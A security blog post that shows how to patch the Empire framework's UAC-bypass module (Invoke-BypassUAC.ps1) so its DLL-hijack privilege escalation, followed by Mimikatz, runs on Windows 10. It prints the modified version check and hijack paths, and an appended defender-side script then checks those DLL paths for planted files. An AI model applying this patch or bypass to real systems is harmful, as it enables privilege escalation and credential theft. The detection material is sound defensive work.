Using Empire in Kali 2.0 to Bypass UAC and Invoke Mimikatz on Win10

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.
So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:

[!] Unsupported OS!
So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3")) {
    # windows 8/2012
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

There it is, that dreaded “Unsupported OS!” error. It looks like it's doing a version check, but not specifically including Windows 10. So let's change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
    # windows 8/2012/10
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

In the original code on line 555 it was looking specifically for Windows 8 or Server 2012. In the modified version I added a check for Windows 10 as well.

Success!
After modifying and saving the code, I ran the command again, and this time it worked!
Here’s a video of me doing this start to finish. As always, if you have any questions feel free to drop by #infoseclabs on freenode.

Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be
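
A defender-side host check built from the paths in the script excerpt above (an added example, not part of the original post and not Empire code): it reports any DLL present at the two locations the script assigns to $szElevDllFull, with signature, owner, timestamps and hash for triage. The function name Find-BypassUacDllArtifact is hypothetical, and treating a file at these paths as worth review is an assumption; a hit is a lead to investigate, not proof of compromise.

```powershell
# Added example (not Empire code): report DLLs sitting at the drop paths
# named in the Invoke-BypassUAC.ps1 excerpt above.
function Find-BypassUacDllArtifact {
    [CmdletBinding()]
    param(
        # Windows directory to inspect; defaults to the running system's.
        [string]$WindowsDir = $env:WINDIR
    )

    # (elevated executable, DLL) pairs taken from the two branches of the script.
    $targets = @(
        [pscustomobject]@{ Branch = 'Windows 7/2008'
                           Exe    = 'System32\sysprep\sysprep.exe'
                           Dll    = 'System32\sysprep\CRYPTBASE.dll' }
        [pscustomobject]@{ Branch = 'Windows 8/2012/10'
                           Exe    = 'System32\cliconfg.exe'
                           Dll    = 'System32\NTWDBLIB.dll' }
    )

    foreach ($t in $targets) {
        $dllPath = Join-Path $WindowsDir $t.Dll
        # Nothing at the path: nothing to report for this branch.
        if (-not (Test-Path -LiteralPath $dllPath -PathType Leaf)) { continue }

        $file = Get-Item -LiteralPath $dllPath -Force
        $sig  = Get-AuthenticodeSignature -LiteralPath $dllPath

        # One object per finding so results can be piped to Export-Csv or a SIEM forwarder.
        [pscustomobject]@{
            Branch          = $t.Branch
            Path            = $file.FullName
            LoadedBy        = Join-Path $WindowsDir $t.Exe
            CreationTimeUtc = $file.CreationTimeUtc
            LastWriteUtc    = $file.LastWriteTimeUtc
            Owner           = (Get-Acl -LiteralPath $dllPath).Owner
            SignatureStatus = $sig.Status
            Signer          = $sig.SignerCertificate.Subject   # $null when unsigned
            SHA256          = (Get-FileHash -LiteralPath $dllPath -Algorithm SHA256).Hash
        }
    }
}

Find-BypassUacDllArtifact | Format-List
```

Run it from a 64-bit PowerShell session: in a 32-bit process on 64-bit Windows, System32 is redirected, which is why the script above keeps a separate sysnative path.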